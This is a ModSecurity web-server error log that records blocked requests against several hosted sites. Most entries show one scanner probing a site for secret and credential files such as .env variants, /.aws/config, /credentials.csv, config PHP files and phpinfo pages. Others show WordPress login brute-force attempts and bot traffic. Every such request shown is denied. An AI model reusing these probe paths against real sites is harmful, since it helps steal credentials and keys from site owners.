[Tue May 26 15:08:09.568281 2026] [security2:error] [pid 678998:tid 679038] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/.env.development"] [unique_id "ahVqAZ-Rl4i_pgT-iAd_uQAAPic"]
[Tue May 26 15:08:10.972841 2026] [security2:error] [pid 678998:tid 679042] [remote 95.216.117.13:46372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVqAp-Rl4i_pgT-iAd_2wAAMCs"]
[Tue May 26 15:08:11.316682 2026] [security2:error] [pid 678998:tid 679079] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/settings.php"] [unique_id "ahVqA5-Rl4i_pgT-iAd_8AAAf1A"]
[Tue May 26 15:08:11.564309 2026] [security2:error] [pid 678998:tid 679230] [client 114.119.139.1:22645] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVqA5-Rl4i_pgT-iAd_-gAAAGY"], referer: http://glorodavionics.com/index.php?route=information/sitemap
[Tue May 26 15:08:11.599969 2026] [security2:error] [pid 678998:tid 679172] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqA5-Rl4i_pgT-iAd_6AAAACw"]
[Tue May 26 15:08:13.168942 2026] [security2:error] [pid 678998:tid 679072] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/s3.php"] [unique_id "ahVqBZ-Rl4i_pgT-iAeAMwAAeEk"]
[Tue May 26 15:08:13.284759 2026] [security2:error] [pid 678998:tid 679180] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqBJ-Rl4i_pgT-iAeAKgAAADQ"]
[Tue May 26 15:08:15.015512 2026] [security2:error] [pid 678998:tid 679040] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/smtp.php"] [unique_id "ahVqB5-Rl4i_pgT-iAeAbAAAWik"]
[Tue May 26 15:08:15.974207 2026] [security2:error] [pid 678998:tid 679213] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqB5-Rl4i_pgT-iAeAewAAAFU"]
[Tue May 26 15:08:16.829392 2026] [security2:error] [pid 678998:tid 679043] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/aws.yml"] [unique_id "ahVqCJ-Rl4i_pgT-iAeAmQAAQyw"]
[Tue May 26 15:08:18.273546 2026] [security2:error] [pid 678998:tid 679170] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqCZ-Rl4i_pgT-iAeAwgAAACo"]
[Tue May 26 15:08:18.628213 2026] [security2:error] [pid 678998:tid 679052] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/credentials.csv"] [unique_id "ahVqCp-Rl4i_pgT-iAeA0wAAUzU"]
[Tue May 26 15:08:20.164759 2026] [security2:error] [pid 678998:tid 679083] [remote 49.255.68.22:42370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.68.255.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVqC5-Rl4i_pgT-iAeA9AAAe1Q"]
[Tue May 26 15:08:20.202796 2026] [security2:error] [pid 678998:tid 679139] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqC5-Rl4i_pgT-iAeA8wAAAAs"]
[Tue May 26 15:08:20.382758 2026] [security2:error] [pid 678998:tid 679041] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/aws.json"] [unique_id "ahVqDJ-Rl4i_pgT-iAeBBAAAGyo"]
[Tue May 26 15:08:22.208541 2026] [security2:error] [pid 678998:tid 679091] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/production.yml"] [unique_id "ahVqDp-Rl4i_pgT-iAeBMwAAVFw"]
[Tue May 26 15:08:22.483762 2026] [security2:error] [pid 678998:tid 679161] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqDp-Rl4i_pgT-iAeBLQAAACE"]
[Tue May 26 15:08:24.050127 2026] [security2:error] [pid 678998:tid 679095] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/server/settings.py"] [unique_id "ahVqEJ-Rl4i_pgT-iAeBawAAfGA"]
[Tue May 26 15:08:24.097759 2026] [security2:error] [pid 678998:tid 679253] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqD5-Rl4i_pgT-iAeBZAAAAH0"]
[Tue May 26 15:08:25.902383 2026] [security2:error] [pid 678998:tid 679108] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/src/config.json"] [unique_id "ahVqEZ-Rl4i_pgT-iAeBnwAAK20"]
[Tue May 26 15:08:26.748136 2026] [security2:error] [pid 678998:tid 679238] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqEp-Rl4i_pgT-iAeBtQAAAG4"]
[Tue May 26 15:08:27.891752 2026] [security2:error] [pid 678998:tid 679112] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/api/config.php"] [unique_id "ahVqE5-Rl4i_pgT-iAeB3AAAb3E"]
[Tue May 26 15:08:28.246524 2026] [security2:error] [pid 678998:tid 679254] [client 72.130.245.217:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqE5-Rl4i_pgT-iAeB2QAAAH4"]
[Tue May 26 15:08:29.110447 2026] [security2:error] [pid 678998:tid 679145] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqFJ-Rl4i_pgT-iAeB9QAAABE"]
[Tue May 26 15:08:29.735407 2026] [security2:error] [pid 678998:tid 679114] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/staging.yml"] [unique_id "ahVqFZ-Rl4i_pgT-iAeCEwAAcXM"]
[Tue May 26 15:08:31.079985 2026] [security2:error] [pid 678998:tid 679133] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqFp-Rl4i_pgT-iAeCWAAAAAU"]
[Tue May 26 15:08:31.264363 2026] [security2:error] [pid 678998:tid 679142] [client 185.191.171.11:65210] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/10/"] [unique_id "ahVqF5-Rl4i_pgT-iAeClQAAAA4"]
[Tue May 26 15:08:31.264520 2026] [security2:error] [pid 678998:tid 679142] [client 185.191.171.11:65210] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/10/"] [unique_id "ahVqF5-Rl4i_pgT-iAeClQAAAA4"]
[Tue May 26 15:08:31.456116 2026] [security2:error] [pid 678998:tid 679082] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/enviroments/.env.production"] [unique_id "ahVqF5-Rl4i_pgT-iAeClwAANVM"]
[Tue May 26 15:08:33.217326 2026] [security2:error] [pid 678998:tid 679194] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqGJ-Rl4i_pgT-iAeCyQAAAEI"]
[Tue May 26 15:08:33.294908 2026] [security2:error] [pid 678998:tid 679090] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/includes/config.inc.php"] [unique_id "ahVqGZ-Rl4i_pgT-iAeC4gAAAFs"]
[Tue May 26 15:08:35.059994 2026] [security2:error] [pid 678998:tid 679123] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/utils/s3-aws.js"] [unique_id "ahVqG5-Rl4i_pgT-iAeDKAAAPHw"]
[Tue May 26 15:08:35.459923 2026] [security2:error] [pid 678998:tid 679166] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqG5-Rl4i_pgT-iAeDIwAAACY"]
[Tue May 26 15:08:36.834905 2026] [security2:error] [pid 678998:tid 679027] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config.js"] [unique_id "ahVqHJ-Rl4i_pgT-iAeDigAAORw"]
[Tue May 26 15:08:37.375895 2026] [security2:error] [pid 678998:tid 679136] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqHJ-Rl4i_pgT-iAeDkgAAAAg"]
[Tue May 26 15:08:37.882397 2026] [security2:error] [pid 678998:tid 679066] [remote 172.194.139.254:14212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.139.194.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVqHZ-Rl4i_pgT-iAeDpgAAFUM"]
[Tue May 26 15:08:38.634998 2026] [security2:error] [pid 678998:tid 679023] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/local.env"] [unique_id "ahVqHp-Rl4i_pgT-iAeDtwAAWRg"]
[Tue May 26 15:08:39.109601 2026] [security2:error] [pid 678998:tid 679152] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqHp-Rl4i_pgT-iAeDugAAABg"]
[Tue May 26 15:08:40.482075 2026] [security2:error] [pid 678998:tid 679079] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/wp-content/plugins/some-plugin/config.php"] [unique_id "ahVqIJ-Rl4i_pgT-iAeD6gAANVA"]
[Tue May 26 15:08:41.335993 2026] [security2:error] [pid 678998:tid 679184] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqIJ-Rl4i_pgT-iAeD9QAAADg"]
[Tue May 26 15:08:42.442872 2026] [security2:error] [pid 678998:tid 679044] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.aws/config"] [unique_id "ahVqIp-Rl4i_pgT-iAeEIgAABC0"]
[Tue May 26 15:08:43.953150 2026] [security2:error] [pid 678998:tid 679241] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqI5-Rl4i_pgT-iAeENwAAAHE"]
[Tue May 26 15:08:44.308739 2026] [security2:error] [pid 678998:tid 679063] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.backup.live"] [unique_id "ahVqJJ-Rl4i_pgT-iAeETAAALEA"]
[Tue May 26 15:08:45.508385 2026] [security2:error] [pid 678998:tid 679205] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqJZ-Rl4i_pgT-iAeEawAAAE0"]
[Tue May 26 15:08:46.141797 2026] [security2:error] [pid 678998:tid 679082] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.release"] [unique_id "ahVqJp-Rl4i_pgT-iAeEgwAAQlM"]
[Tue May 26 15:08:47.942365 2026] [security2:error] [pid 678998:tid 679078] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/aws.php"] [unique_id "ahVqJ5-Rl4i_pgT-iAeEuQAAHE8"]
[Tue May 26 15:08:48.218594 2026] [security2:error] [pid 678998:tid 679212] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqJ5-Rl4i_pgT-iAeEtQAAAFQ"]
[Tue May 26 15:08:48.393290 2026] [security2:error] [pid 678998:tid 679039] [remote 47.128.119.151:20134] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVqJZ-Rl4i_pgT-iAeEbQAAKSg"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/9f022926be415092-9f022926be415092-combined.css
[Tue May 26 15:08:50.228697 2026] [security2:error] [pid 678998:tid 679091] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/server/settings_prod.py"] [unique_id "ahVqKp-Rl4i_pgT-iAeE9wAAN1w"]
[Tue May 26 15:08:50.376592 2026] [security2:error] [pid 678998:tid 679132] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqKZ-Rl4i_pgT-iAeE7gAAAAQ"]
[Tue May 26 15:08:52.034562 2026] [security2:error] [pid 678998:tid 679096] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/server/settings_local.py"] [unique_id "ahVqLJ-Rl4i_pgT-iAeFNQAAdWE"]
[Tue May 26 15:08:52.112280 2026] [security2:error] [pid 678998:tid 679218] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqK5-Rl4i_pgT-iAeFLAAAAFo"]
[Tue May 26 15:08:53.842371 2026] [security2:error] [pid 678998:tid 679105] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/sys/info.php"] [unique_id "ahVqLZ-Rl4i_pgT-iAeFawAAM2o"]
[Tue May 26 15:08:54.734892 2026] [security2:error] [pid 678998:tid 679138] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqLp-Rl4i_pgT-iAeFgAAAAAo"]
[Tue May 26 15:08:55.681751 2026] [security2:error] [pid 678998:tid 679110] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/information.php"] [unique_id "ahVqL5-Rl4i_pgT-iAeFrAAANm8"]
[Tue May 26 15:08:56.217713 2026] [security2:error] [pid 678998:tid 679178] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqL5-Rl4i_pgT-iAeFsAAAADI"]
[Tue May 26 15:08:56.904020 2026] [http2:info] [pid 686593:tid 686593] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 15:08:57.095800 2026] [security2:error] [pid 678998:tid 679241] [client 146.174.181.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqMJ-Rl4i_pgT-iAeFxwAAAHE"]
[Tue May 26 15:08:58.428075 2026] [security2:error] [pid 686593:tid 686698] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/backend/phpinfo.php"] [unique_id "ahVqMuilgkZcvx0_tl-cawAAsmg"]
[Tue May 26 15:08:58.980089 2026] [security2:error] [pid 686593:tid 686790] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqMuilgkZcvx0_tl-ccAAAAMg"]
[Tue May 26 15:09:00.501997 2026] [security2:error] [pid 686593:tid 686608] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/server_info.php"] [unique_id "ahVqNOilgkZcvx0_tl-cvwAAhQ4"]
[Tue May 26 15:09:00.533130 2026] [security2:error] [pid 686593:tid 686813] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqNOilgkZcvx0_tl-crwAAAN8"]
[Tue May 26 15:09:02.395976 2026] [security2:error] [pid 686593:tid 686614] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/api/v2/phpinfo.php"] [unique_id "ahVqNuilgkZcvx0_tl-c_QAA3xQ"]
[Tue May 26 15:09:03.348774 2026] [security2:error] [pid 686593:tid 686850] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqNuilgkZcvx0_tl-dCgAAAQQ"]
[Tue May 26 15:09:03.920748 2026] [security2:error] [pid 686593:tid 686617] [remote 74.7.241.58:56802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVqN-ilgkZcvx0_tl-dKAAA1hc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 15:09:04.246770 2026] [security2:error] [pid 686593:tid 686707] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/bak/phpinfo.php"] [unique_id "ahVqOOilgkZcvx0_tl-dOgAA3HE"]
[Tue May 26 15:09:05.427307 2026] [security2:error] [pid 686593:tid 686815] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqOOilgkZcvx0_tl-dUgAAAOE"]
